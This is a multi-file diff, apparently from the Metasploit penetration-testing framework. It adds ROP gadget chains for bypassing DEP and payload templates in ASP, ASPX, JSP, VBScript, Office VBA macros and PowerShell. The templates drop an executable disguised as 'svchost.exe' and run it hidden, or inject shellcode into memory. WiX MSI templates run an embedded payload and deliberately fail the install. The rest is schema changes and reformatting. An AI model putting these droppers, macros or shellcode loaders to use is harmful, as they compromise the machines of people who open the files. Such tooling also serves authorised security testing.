 		<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
 		<gadget offset="0x000136e3">POP EBX # RETN</gadget>
 		<gadget value="0xffffffff"></gadget>
@@ -7,12 +7,21 @@
 	</compatibility>

 	<gadgets base="0x77c10000">
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001362c">POP EBX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
-		<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
 		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 		<gadget offset="0x0004d9bb">Writable location</gadget>
 		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@@ -33,23 +42,29 @@
 	</compatibility>

 	<gadgets base="0x77ba0000">
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-		<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget offset="0x00001114">VirtualProtect()</gadget>
 		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
-		<gadget value="junk">Filler</gadget>
+		<gadget value="junk">JUNK</gadget>
 		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
-		<gadget offset="0x00026320">POP EBP # RETN</gadget>
-		<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
-		<gadget offset="0x000385b7">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
-		<gadget offset="0x000330fb">POP ECX # RETN</gadget>
-		<gadget offset="0x0004ff56">Writable location</gadget>
-		<gadget offset="0x00038a92">POP EDI # RETN</gadget>
-		<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00029801">POP EBP # RETN</gadget>
+		<gadget offset="0x00042265">ptr to 'push esp #  ret'</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0990F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
+		<gadget offset="0x000148d3">POP EBX, RET</gadget>
+		<gadget offset="0x000521e0">.data</gadget>
+		<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
+		<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
+		<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
+		<gadget offset="0x00038c04">POP EDI # RETN</gadget>
+		<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0944F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
+		<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="nop">NOP</gadget>
 		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
 	</gadgets>
 </rop>
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby

 Dir.open(".").entries.grep(/.aiff$/).each do |inp|
-	out = inp.gsub(".aiff", ".wav")
-	system("sox #{inp} #{out}")
+  out = inp.gsub(".aiff", ".wav")
+  system("sox #{inp} #{out}")
 end

@@ -1,34 +1,34 @@
 sounds = {
-	'num0' => '0',
-	'num1' => '1',
-	'num2' => '2',
-	'num3' => '3',
-	'num4' => '4',
-	'num5' => '5',
-	'num6' => '6',
-	'num7' => '7',
-	'num8' => '8',
-	'num9' => '9',
-	'closed' => 'closed',
-	'opened' => 'opened',
-	'plugin_load' => 'meta sploit sound plugin has been loaded',
-	'plugin_unload' => 'sound plugin has been unloaded',
-	'session' => 'session',
-	'address' => 'address',
-	'port'    => 'port',
-	'dot'     => 'dot',
-	'session_open_meterpreter' => 'a new meterp reter session has been opened',
-	'session_open_shell' => 'a new command shell session has been opened',
-	'session_open_vnc'	=> 'a new VNC session has been opened'
+  'num0' => '0',
+  'num1' => '1',
+  'num2' => '2',
+  'num3' => '3',
+  'num4' => '4',
+  'num5' => '5',
+  'num6' => '6',
+  'num7' => '7',
+  'num8' => '8',
+  'num9' => '9',
+  'closed' => 'closed',
+  'opened' => 'opened',
+  'plugin_load' => 'meta sploit sound plugin has been loaded',
+  'plugin_unload' => 'sound plugin has been unloaded',
+  'session' => 'session',
+  'address' => 'address',
+  'port'    => 'port',
+  'dot'     => 'dot',
+  'session_open_meterpreter' => 'a new meterp reter session has been opened',
+  'session_open_shell' => 'a new command shell session has been opened',
+  'session_open_vnc'	=> 'a new VNC session has been opened'
 }

 voice_name = 'Zarvox'

 def create_aiff(voice, file,text)
-	system("say -v #{voice} -o #{file}.aiff #{text}")
+  system("say -v #{voice} -o #{file}.aiff #{text}")
 end

 sounds.keys.each do |k|
-	create_aiff(voice_name, k, sounds[k])
+  create_aiff(voice_name, k, sounds[k])
 end

@@ -0,0 +1,24 @@
+<%% @language="VBScript" %%>
+<%% 
+	Sub %{var_func}()
+		%{var_shellcode}
+		Dim %{var_obj}
+		Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+		Dim %{var_stream}
+		Dim %{var_tempdir}
+		Dim %{var_tempexe}
+		Dim %{var_basedir}
+		Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+		%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+		%{var_obj}.CreateFolder(%{var_basedir})
+		%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+		Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
+		%{var_stream}.Write %{var_bytes}
+		%{var_stream}.Close
+		Dim %{var_shell}
+		Set %{var_shell} = CreateObject("Wscript.Shell")
+		%{var_shell}.run %{var_tempexe}, 0, false
+	End Sub
+
+	%{var_func}
+%%>
@@ -0,0 +1,30 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+	protected void Page_Load(object sender, EventArgs e)
+	{
+		%{shellcode}
+		string %{var_tempdir} = Path.GetTempPath();
+		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
+		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
+		
+		Directory.CreateDirectory(%{var_basedir});
+		
+		FileStream fs = File.Create(%{var_tempexe});
+		
+		try
+		{
+			fs.Write(%{var_file}, 0, %{var_file}.Length);
+		}
+		finally
+		{
+			if (fs != null) ((IDisposable)fs).Dispose();
+		}
+
+		System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
+		%{var_proc}.StartInfo.CreateNoWindow = true;
+		%{var_proc}.StartInfo.UseShellExecute = true;
+		%{var_proc}.StartInfo.FileName = %{var_tempexe};
+		%{var_proc}.Start();
+	}
+</script>
@@ -0,0 +1,81 @@
+'**************************************************************
+'*
+'* This code is now split into two pieces:
+'*  1. The Macro. This must be copied into the Office document
+'*     macro editor. This macro will run on startup.
+'*
+'*  2. The Data. The hex dump at the end of this output must be
+'*     appended to the end of the document contents.
+'*
+'**************************************************************
+'*
+'* MACRO CODE
+'*
+'**************************************************************
+
+Sub Auto_Open()
+	%{func_name1}
+End Sub
+
+Sub %{func_name1}()
+	Dim %{var_appnr} As Integer
+	Dim %{var_fname} As String
+	Dim %{var_fenvi} As String
+	Dim %{var_fhand} As Integer
+	Dim %{var_parag} As Paragraph
+	Dim %{var_index} As Integer
+	Dim %{var_gotmagic} As Boolean
+	Dim %{var_itemp} As Integer
+	Dim %{var_stemp} As String
+	Dim %{var_btemp} As Byte
+	Dim %{var_magic} as String
+	%{var_magic} = "%{var_magic}"
+	%{var_fname} = "%{filename}.exe"
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_fhand} = FreeFile()
+	Open %{var_fname} For Binary As %{var_fhand}
+	For Each %{var_parag} in ActiveDocument.Paragraphs
+		DoEvents
+			%{var_stemp} = %{var_parag}.Range.Text
+		If (%{var_gotmagic} = True) Then
+			%{var_index} = 1
+			While (%{var_index} < Len(%{var_stemp}))
+				%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
+				Put #%{var_fhand}, , %{var_btemp}
+				%{var_index} = %{var_index} + 4
+			Wend
+		ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
+			%{var_gotmagic} = True
+		End If
+	Next
+	Close #%{var_fhand}
+	%{func_name2}(%{var_fname})
+End Sub
+
+Sub %{func_name2}(%{var_farg} As String)
+	Dim %{var_appnr} As Integer
+	Dim %{var_fenvi} As String
+	%{var_fenvi} = Environ("USERPROFILE")
+	ChDrive (%{var_fenvi})
+	ChDir (%{var_fenvi})
+	%{var_appnr} = Shell(%{var_farg}, vbHide)
+End Sub
+
+Sub AutoOpen()
+	Auto_Open
+End Sub
+
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+
+'**************************************************************
+'*
+'* PAYLOAD DATA
+'*
+'**************************************************************
+
+%{var_magic}
+%{data}
@@ -0,0 +1,24 @@
+Function %{var_func}()
+%{var_shellcode}
+
+	Dim %{var_obj}
+	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
+	Dim %{var_tempdir}
+	Dim %{var_tempexe}
+	Dim %{var_basedir}
+	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	%{var_stream}.Write %{var_bytes}
+	%{var_stream}.Close
+	Dim %{var_shell}
+	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run %{var_tempexe}, 0, true
+	%{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFolder(%{var_basedir})
+End Function
+
+%{init}
@@ -0,0 +1,49 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+		
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	} 
+	else 
+	{
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+	}
+%%>
@@ -0,0 +1,21 @@
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
+<script runat="server">
+    private static Int32 MEM_COMMIT=0x1000;
+    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
+
+    protected void Page_Load(object sender, EventArgs e)
+    {
+        %{shellcode}
+        IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
+        IntPtr %{var_threadId} = IntPtr.Zero;
+        IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
+    }
+</script>
@@ -0,0 +1,32 @@
+#If Vba7 Then
+	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
+	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
+	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
+#Else
+	Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
+	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
+	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
+#EndIf
+
+Sub Auto_Open()
+	Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
+#If Vba7 Then
+	Dim  %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
+#Else
+	Dim  %{var_rwxpage} As Long, %{var_res} As Long
+#EndIf
+	%{bytes}
+	%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
+	For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
+		%{var_myByte} = %{var_myArray}(%{var_offset})
+		%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
+	Next %{var_offset}
+	%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+	Auto_Open
+End Sub
+Sub Workbook_Open()
+	Auto_Open
+End Sub
+
@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+%{shellcode}
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+	$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
@@ -0,0 +1,3 @@
+*.msi
+*.wixobj
+*.wixpdb
@@ -0,0 +1,7 @@
+Compile using WiX: http://wixtoolset.org
+
+Recompile with a larger buffer file to increase the available
+buffer size for larger payloads if required.
+
+candle template_x86_windows.wxs
+light template_x86_windows.wixobj
@@ -0,0 +1,18 @@
+@echo off
+REM Set PATH to location of your WiX binaries
+SET PATH=%PATH%;c:\tools\local\wix38-binaries\
+@echo on
+
+candle template_windows.wxs
+light template_windows.wixobj
+copy template_windows.msi ..\..\template_windows.msi
+del template_windows.msi
+del template_windows.wixobj
+del template_windows.wixpdb
+
+candle template_nouac_windows.wxs
+light template_nouac_windows.wixobj
+copy template_nouac_windows.msi ..\..\template_nouac_windows.msi
+del template_nouac_windows.msi
+del template_nouac_windows.wixobj
+del template_nouac_windows.wixpdb
@@ -0,0 +1,38 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+  <Product Name='Foobar 1.0' Id='*' 
+    Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+	<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" InstallPrivileges="limited" />	
+	
+	<Media Id='1' />
+
+	<Directory Id='TARGETDIR' Name='SourceDir'>
+	   <Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+		  <Condition>0</Condition>
+	   </Component>		
+	</Directory>
+	
+	<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
+	<Binary Id='Payload' SourceFile='buffer' />
+	
+	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+	<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='yes' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
+	<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
+	<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
+
+    <Feature Id='Complete' Level='1'>
+		<ComponentRef Id='MyComponent' />
+    </Feature>
+	
+	<!-- Define ALLUSERS with a blank value -->
+	<Property Id="ALLUSERS" Secure="yes"/>
+	
+	<InstallExecuteSequence>
+		<ResolveSource After="CostInitialize" />
+		<Custom Action="ExecPayload" After="InstallInitialize" />
+		<Custom Action="FailInstallation" Before="InstallFiles" />
+	</InstallExecuteSequence>
+
+  </Product>
+</Wix>
@@ -0,0 +1,35 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+  <Product Name='Foobar 1.0' Id='*' 
+    Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+	<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />	
+	
+	<Media Id='1' />
+
+	<Directory Id='TARGETDIR' Name='SourceDir'>
+	   <Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+		  <Condition>0</Condition>
+	   </Component>		
+	</Directory>
+	
+	<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
+	<Binary Id='Payload' SourceFile='buffer' />
+	
+	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+	<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='no' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
+	<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
+	<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
+
+    <Feature Id='Complete' Level='1'>
+		<ComponentRef Id='MyComponent' />
+    </Feature>
+	
+	<InstallExecuteSequence>
+		<ResolveSource After="CostInitialize" />
+		<Custom Action="ExecPayload" After="InstallInitialize" />
+		<Custom Action="FailInstallation" Before="InstallFiles" />
+	</InstallExecuteSequence>
+
+  </Product>
+</Wix>
@@ -0,0 +1,8 @@
+aspnet_client/
+Autodiscover/
+ecp/
+EWS/
+Microsoft-Server-ActiveSync/
+OAB/
+PowerShell/
+Rpc/
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended to check this file into your version control system.

-ActiveRecord::Schema.define(:version => 20130604145732) do
+ActiveRecord::Schema.define(:version => 20130717150737) do

  create_table "api_keys", :force => true do |t|
    t.text     "token"
@@ -19,30 +19,6 @@ ActiveRecord::Schema.define(:version => 20130604145732) do
    t.datetime "updated_at", :null => false
  end

-  create_table "attachments", :force => true do |t|
-    t.string  "name",         :limit => 512
-    t.binary  "data"
-    t.string  "content_type", :limit => 512
-    t.boolean "inline",                      :default => true,  :null => false
-    t.boolean "zip",                         :default => false, :null => false
-    t.integer "campaign_id"
-  end
-
-  create_table "attachments_email_templates", :id => false, :force => true do |t|
-    t.integer "attachment_id"
-    t.integer "email_template_id"
-  end
-
-  create_table "campaigns", :force => true do |t|
-    t.integer  "workspace_id",                               :null => false
-    t.string   "name",         :limit => 512
-    t.text     "prefs"
-    t.integer  "status",                      :default => 0
-    t.datetime "started_at"
-    t.datetime "created_at",                                 :null => false
-    t.datetime "updated_at",                                 :null => false
-  end
-
  create_table "clients", :force => true do |t|
    t.integer  "host_id"
    t.datetime "created_at"
@@ -65,24 +41,6 @@ ActiveRecord::Schema.define(:version => 20130604145732) do
    t.string   "source_type"
  end

-  create_table "email_addresses", :force => true do |t|
-    t.integer  "campaign_id",                                   :null => false
-    t.string   "first_name",  :limit => 512
-    t.string   "last_name",   :limit => 512
-    t.string   "address",     :limit => 512
-    t.boolean  "sent",                       :default => false, :null => false
-    t.datetime "clicked_at"
-  end
-
-  create_table "email_templates", :force => true do |t|
-    t.string  "name",        :limit => 512
-    t.string  "subject",     :limit => 1024
-    t.text    "body"
-    t.integer "parent_id"
-    t.integer "campaign_id"
-    t.text    "prefs"
-  end
-
  create_table "events", :force => true do |t|
    t.integer  "workspace_id"
    t.integer  "host_id"
@@ -581,14 +539,6 @@ ActiveRecord::Schema.define(:version => 20130604145732) do
  add_index "web_sites", ["options"], :name => "index_web_sites_on_options"
  add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost"

-  create_table "web_templates", :force => true do |t|
-    t.string  "name",        :limit => 512
-    t.string  "title",       :limit => 512
-    t.string  "body",        :limit => 524288
-    t.integer "campaign_id"
-    t.text    "prefs"
-  end
-
  create_table "web_vulns", :force => true do |t|
    t.integer  "web_site_id",                 :null => false
    t.datetime "created_at",                  :null => false
@@ -596,7 +546,7 @@ ActiveRecord::Schema.define(:version => 20130604145732) do
    t.text     "path",                        :null => false
    t.string   "method",      :limit => 1024, :null => false
    t.text     "params",                      :null => false
-    t.text     "pname",                       :null => false
+    t.text     "pname"
    t.integer  "risk",                        :null => false
    t.string   "name",        :limit => 1024, :null => false
    t.text     "query"
@@ -13,22 +13,22 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
 require 'msf/base'

 if (ARGV.empty?)
-	puts "Usage: #{File.basename(__FILE__)} module_name"
-	exit
+  puts "Usage: #{File.basename(__FILE__)} module_name"
+  exit
 end

 modname = ARGV.shift
 framework = Msf::Simple::Framework.create

 begin
-	# Create the module instance.
-	mod = framework.modules.create(modname)
-	if not mod
-		puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
-	else
-		# Dump the module's information in readable text format.
-		puts Msf::Serializer::ReadableText.dump_module(mod)
-	end
+  # Create the module instance.
+  mod = framework.modules.create(modname)
+  if not mod
+    puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
+  else
+    # Dump the module's information in readable text format.
+    puts Msf::Serializer::ReadableText.dump_module(mod)
+  end
 rescue
-	puts "Error: #{$!}\n\n#{$@.join("\n")}"
+  puts "Error: #{$!}\n\n#{$@.join("\n")}"
 end
@@ -13,18 +13,18 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
 require 'msf/base'

 if (ARGV.empty?)
-	puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
-	exit
+  puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
+  exit
 end

 framework = Msf::Simple::Framework.create

 begin
-	# Create the encoder instance.
-	mod = framework.encoders.create(ARGV.shift)
+  # Create the encoder instance.
+  mod = framework.encoders.create(ARGV.shift)

-	puts(Msf::Simple::Buffer.transform(
-		mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
+  puts(Msf::Simple::Buffer.transform(
+    mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
 rescue
-	puts "Error: #{$!}\n\n#{$@.join("\n")}"
+  puts "Error: #{$!}\n\n#{$@.join("\n")}"
 end
@@ -16,5 +16,5 @@ framework = Msf::Simple::Framework.create

 # Enumerate each module in the framework.
 framework.modules.each_module { |name, mod|
-	puts "#{mod.type}: #{name}"
+  puts "#{mod.type}: #{name}"
 }
@@ -14,8 +14,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
 require 'msf/base'

 if (ARGV.length == 0)
-	puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
-	exit
+  puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
+  exit
 end

 framework    = Msf::Simple::Framework.create
@@ -25,28 +25,28 @@ input        = Rex::Ui::Text::Input::Stdio.new
 output       = Rex::Ui::Text::Output::Stdio.new

 begin
-	# Initialize the exploit instance
-	exploit = framework.exploits.create(exploit_name)
+  # Initialize the exploit instance
+  exploit = framework.exploits.create(exploit_name)

-	# Fire it off.
-	session = exploit.exploit_simple(
-		'Payload'     => payload_name,
-		'OptionStr'   => ARGV.join(' '),
-		'LocalInput'  => input,
-		'LocalOutput' => output)
